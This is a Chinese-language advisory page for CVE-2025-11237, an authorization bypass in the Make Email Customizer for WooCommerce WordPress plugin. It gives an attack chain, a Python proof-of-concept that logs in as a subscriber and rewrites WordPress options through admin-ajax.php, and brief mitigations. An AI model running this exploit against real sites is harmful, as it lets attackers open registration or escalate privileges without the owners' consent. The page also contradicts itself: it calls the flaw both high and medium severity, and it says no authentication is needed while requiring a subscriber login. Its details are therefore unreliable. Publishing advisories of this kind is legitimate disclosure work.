CVE-2025-11237 CVSS 5.3 中危

CVE-2025-11237 WordPress Make Email Customizer插件权限绕过漏洞

披露日期: 2025-11-11

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-11237

漏洞类型

权限绕过

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Make Email Customizer for WooCommerce WordPress plugin

漏洞概述

CVE-2025-11237是WordPress插件Make Email Customizer for WooCommerce中的一个高危安全漏洞。该插件在1.0.6及之前版本中，其AJAX操作缺乏适当的授权检查和选项验证机制。攻击者只需拥有一个最低权限的订阅者（Subscriber）账户，即可利用此漏洞修改任意WordPress选项，可能导致网站配置被恶意篡改、用户权限提升或进一步的安全威胁。此漏洞无需任何用户交互，攻击者可通过远程网络直接发起攻击，CVSS评分5.3，属于中等严重程度。由于WordPress的选项（options）存储着网站的核心配置信息，包括站点URL、管理员邮箱、用户注册设置等敏感数据，因此该漏洞可能造成严重的安全风险。

技术细节

该漏洞源于Make Email Customizer for WooCommerce插件的AJAX动作处理器未正确实现WordPress的权限检查机制。在WordPress中，AJAX请求通常需要通过wp_ajax_*或wp_ajax_nopriv_*钩子处理，对于需要高权限的操作应使用current_user_can()函数进行权限验证。然而，该插件的AJAX处理器直接处理用户提交的选项更新请求，未验证当前用户是否具有管理选项的权限（manage_options capability）。由于WordPress默认允许所有已认证用户（包括Subscriber角色）访问wp_ajax_*端点，攻击者可以构造恶意请求，指定任意选项名称和值，绕过授权检查直接修改WordPress数据库中的options表内容。攻击者可通过此方式修改siteurl、home等关键选项，甚至可能启用用户注册功能或提升普通用户权限。

攻击链分析

STEP 1

步骤1

攻击者注册一个WordPress账户，获取Subscriber角色

STEP 2

步骤2

攻击者登录WordPress，获取有效的认证会话cookie

STEP 3

步骤3

攻击者构造恶意AJAX请求，指定目标选项名称和期望的值

STEP 4

步骤4

请求发送到admin-ajax.php端点，插件的AJAX处理器接收请求

STEP 5

步骤5

插件未验证用户权限，直接将攻击者提供的选项写入WordPress数据库

STEP 6

步骤6

攻击者修改关键选项如users_can_register、default_role等，实现权限提升或其他攻击目的

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-11237 PoC
# Make Email Customizer for WooCommerce < 1.0.7 Authorization Bypass

target_url = "https://target-site.com/wp-admin/admin-ajax.php"

# Authenticate as subscriber (low-privilege user)
session = requests.Session()
login_data = {
    "log": "attacker_username",
    "pwd": "attacker_password",
    "wp-submit": "Log In",
    "testcookie": "1"
}

# Login to WordPress
session.post("https://target-site.com/wp-login.php", data=login_data)

# Exploit: Update arbitrary WordPress option without authorization
# Example: Change site URL or enable user registration
exploit_data = {
    "action": "make_email_customizer_save_option",
    "option_name": "users_can_register",
    "option_value": "1"
}

response = session.post(target_url, data=exploit_data)
print(f"Status: {response.status_code}")
print(f"Response: {response.text}")

影响范围

Make Email Customizer for WooCommerce < 1.0.7

防御指南

临时缓解措施

如果无法立即更新插件，可通过以下方式临时缓解：在wp-config.php中添加权限限制，确保非管理员无法修改关键选项；或使用第三方安全插件（如Wordfence）监控异常的选项修改行为；也可以暂时禁用该插件直至官方发布修复版本。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表